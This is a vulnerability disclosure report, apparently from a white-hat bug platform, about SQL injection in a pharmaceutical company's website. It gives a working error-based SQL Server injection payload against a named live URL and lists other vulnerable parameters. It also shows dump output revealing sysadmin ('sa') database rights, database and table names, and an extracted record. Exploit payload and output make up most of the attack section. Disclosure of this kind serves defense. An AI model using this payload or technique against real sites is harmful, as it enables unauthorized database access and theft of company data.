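2015-08-18: Details reported to the vendor; awaiting vendor response
2015-08-19: Vendor confirmed; details disclosed to the vendor only
2015-08-29: Details disclosed to core white hats and experts in related fields
2015-09-08: Details disclosed to regular white hats
2015-09-18: Details disclosed to intern white hats
2015-10-03: Details disclosed to the public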
The company's site has multiple SQL injection vulnerabilities that seriously affect data security.
Injection point:
http://www.crsdyy.com/sdgs/index.asp?buid=3701000110
---
Parameter: buid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

current user: 'sa'
current user is DBA: True

available databases [9]:
[*] master
[*] model
[*] msdb
[*] sdgs
[*] shxt
[*] sjcj
[*] sjzl
[*] syxh
[*] tempdb

Database: sdgs
[25 tables]
+----------------+
| biuser_bak     |
| bulist         |
| download       |
| download_type  |
| fwl            |
| gysuser        |
| ip             |
| link           |
| lxjl           |
| medicine_type  |
| news           |
| news_type      |
| product        |
| pt_user        |
| qyfc           |
| qyxchz         |
| qyxcmx         |
| sqlmapoutput   |
| sysuser        |
| v_search       |
| zhaoshang      |
| zhaoshang_oid  |
| zhaoshang_type |
| zlzx           |
| zlzx_type      |
+----------------+

Database: master
[301 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS              |
| INFORMATION_SCHEMA.COLUMNS                        |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE            |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES              |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE        |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE         |
| INFORMATION_SCHEMA.DOMAINS                        |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS             |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE               |
| INFORMATION_SCHEMA.PARAMETERS                     |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS        |
| INFORMATION_SCHEMA.ROUTINES                       |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS                |
| INFORMATION_SCHEMA.SCHEMATA                       |
| INFORMATION_SCHEMA.TABLES                         |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS              |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES               |
| INFORMATION_SCHEMA.VIEWS                          |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE              |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE               |
| MSreplication_options                             |
| dj_ls                                             |
| djbh                                              |
| djhz                                              |
| djmx                                              |
| kh_doc                                            |
| sp_doc                                            |
| spt_fallback_db                                   |
| spt_fallback_dev                                  |
| spt_fallback_usg                                  |
| spt_monitor                                       |
| spt_values                                        |
| userlist                                          |
| v_dj_ls                                           |
| v_rkmx                                            |
| sys.all_columns                                   |
| sys.all_objects                                   |
| sys.all_parameters                                |
| sys.all_sql_modules                               |
| sys.all_views                                     |
+---------------------------------------------------+

Database: sjcj
[81 tables]
+----------+
| aslk1    |
| becc1    |
| beyy1    |
| bjhh01   |
| bjhs01   |
| bjhs1    |
| bjnh1    |
| bjnhobu1 |
| bjsh1    |
| blg01    |
| blkxy01  |
+-----------

Database: sjcj
Table: aslk1
[1 entry]
+--------+------------+---------------------+---------+----------+---------+
| makeno | rq         | warename            | wareqty | wareunit | 公司名称 |
+--------+------------+---------------------+---------+----------+---------+
| XCWZ   | 2015-08-17 | 注射用奥美拉唑钠(静脉滴注)(洛赛克) | 96.0000 | 支       | <blank> |
+--------+------------+---------------------+---------+----------+---------+
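There is plenty more important information, but I won't run through all the data one by one. The other injection points are included here as well: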
http://www.crsdyy.com/sdgs/index.asp?buid=3701000106
http://www.crsdyy.com/sdgs/index.asp?buid=3701000107
http://www.crsdyy.com/sdgs/index.asp?buid=3701000108
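Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-08-19 15:20
sa privileges, yet again the kind of thing that gets someone into the internal network in minutes, sigh!! The pharmaceutical group has been notified.
None yet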